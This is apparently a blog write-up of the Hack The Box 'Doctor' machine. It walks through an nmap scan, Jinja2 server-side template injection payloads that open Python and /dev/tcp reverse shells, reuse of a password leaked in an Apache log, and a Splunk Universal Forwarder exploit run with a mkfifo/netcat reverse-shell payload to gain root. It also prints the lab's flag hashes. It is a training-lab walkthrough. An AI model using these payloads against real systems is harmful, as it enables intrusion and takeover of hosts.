Hack-The-Box-walkthrough[doctor]

Posted on Edited on In Views: Word count in article: 1.1k Reading time ≈ 4 mins.

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 26 Sep 2020
IP: 10.10.10.209

User Blood jkr 00 days, 00 hours, 36 mins, 05 seconds.
Root Blood xct 00 days, 00 hours, 36 mins, 12 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
root@kali:~/hackthebox/machine/doctor# nmap -sV -v -p- --min-rate=10000 10.10.10.209
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
8089/tcp open  ssl/http Splunkd httpd

on port 80, find a subdomain

1
2
Send us a message
info@doctors.htb

add this to our /etc/hosts file. Now let’s go to doctors.htb

a login page. Try some sql injections

But nothing is working. now Registe ourself and try to login then

So its show nothing, Lets check theSource Code

1
2
3
<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->
</div>
<!-- Navbar Right Side -->

This seems to be some link /archive let’s go to that page and see what’s on that

Hmmm, Blank Page

Let’s, try to submit a new message

Let’s, try first simple html H1 tag

1
2
3
4
5
title
<h1>hello</h1>

content
<h1>hello</h1>

It accept this html h1 tag but were we got the response of that.

Let’s check on that /archive page .

But still it’s blank. Let’s check the source code of that page.

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title><h1>hello</h1></title></item>

        </channel>

Our response is there. But he didn’t execute, Let’s try to modify this html tag

1
2
3
4
5
title
</title></item><h1>hello</h1>

content
</title></item><h1>hello</h1>

let’s try to post this. and it worked

the source code

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title></title></item><h1>hello</h1></title></item>

        </channel>

this is vulnerable from Server-Side Template Injection
I Found interesting Article

  • Server Side Template Injection

try Jinja2 Basic injection

First, We are using 49

1
2
3
4
5
title
</title></item>{{7*'7'}}

content
</title></item>{{7*'7'}}

If this executed successfully so we will get the response of 7777777

Boom it’s executed successfuly. Now let’s use Exploit the SSTI by writing an evil config file To Get the reverse shell.

We are using this exploit

Exploit the SSTI by writing an evil config file.

1
2
3
4
5
6
7
8
# evil config
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}

# load the evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}

# connect to evil host
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}

payload

1
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.7\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

Let’s go to the /archivePage But First start a netcat lisner on 9001 port

It’s reloding, let’s check our netcat lisner.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~/hackthebox/machine/doctor# nc -lvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:34444.
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
web@doctor:~$ whoami
whoami
web

hmm, We find something interesting thing in /var/log/apache2/

In the /var/log/apache2/ directory there is a file called backup. Let’s check there is any password or anything interesting in That.

1
2
3
web@doctor:/var/log/apache2$ cat backup | grep pass
cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

now we we find password of shaun, then switch to shaun

1
2
3
4
5
6
7
8
9
web@doctor:/var/log/apache2$ su shaun
su shaun
Password: Guitar123
id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
whoami
shaun
python3 -c 'import pty; pty.spawn("/bin/bash")'
shaun@doctor:/var/log/apache2$

now we got user.txt

1
2
3
shaun@doctor:~$ cat user.txt
cat user.txt
e52b07d06a90865c8c939712f50f9e71

Privilege escalation
run LinPEAS And Find Something interesting.

  • LinPEAS - Linux Privilege Escalation Awesome Script

after some google search we find the following script could be used to get privesclation

  • PySplunkWhisperer2_remote.py

Local privilege escalation, or remote code execution, through Splunk Universal Forwarder (UF) misconfigurations. See

  • Splunk-Universal-Forwarder-Hijacking-2-SplunkWhisperer2

for more details.

payload:

1
python PySplunkWhisperer2_remote.py --lhost 10.10.14.7 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.14.7 5555 >/tmp/luci11"'

run this, and we got a root shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~/hackthebox/machine/doctor# python PySplunkWhisperer2_remote.py --lhost 10.10.14.7 --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/luci11;mkfifo /tmp/luci11;cat /tmp/luci11|/bin/sh -i 2>&1|nc 10.10.14.7 5555 >/tmp/luci11"'
/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release.
  from cryptography import x509
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpiRqdZO.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.7:8181/
10.10.10.209 - - [29/Sep/2020 13:45:08] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root@kali:~/hackthebox/machine/doctor# nc -lvp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:48386.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var
# cd /root
# ls
root.txt
# cat root.txt
316ae3165720f8c125e259d7a3290c85

Summary of knowledge

  • Server Side Template Injection
  • Jinja2 Basic injection
  • Exploit the SSTI by writing an evil config file
  • password leaked in /var/log/apache2/backup
  • Splunk Universal Forwarder (UF) misconfigurations
  • use PySplunkWhisperer2_remote.py to get root shell

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…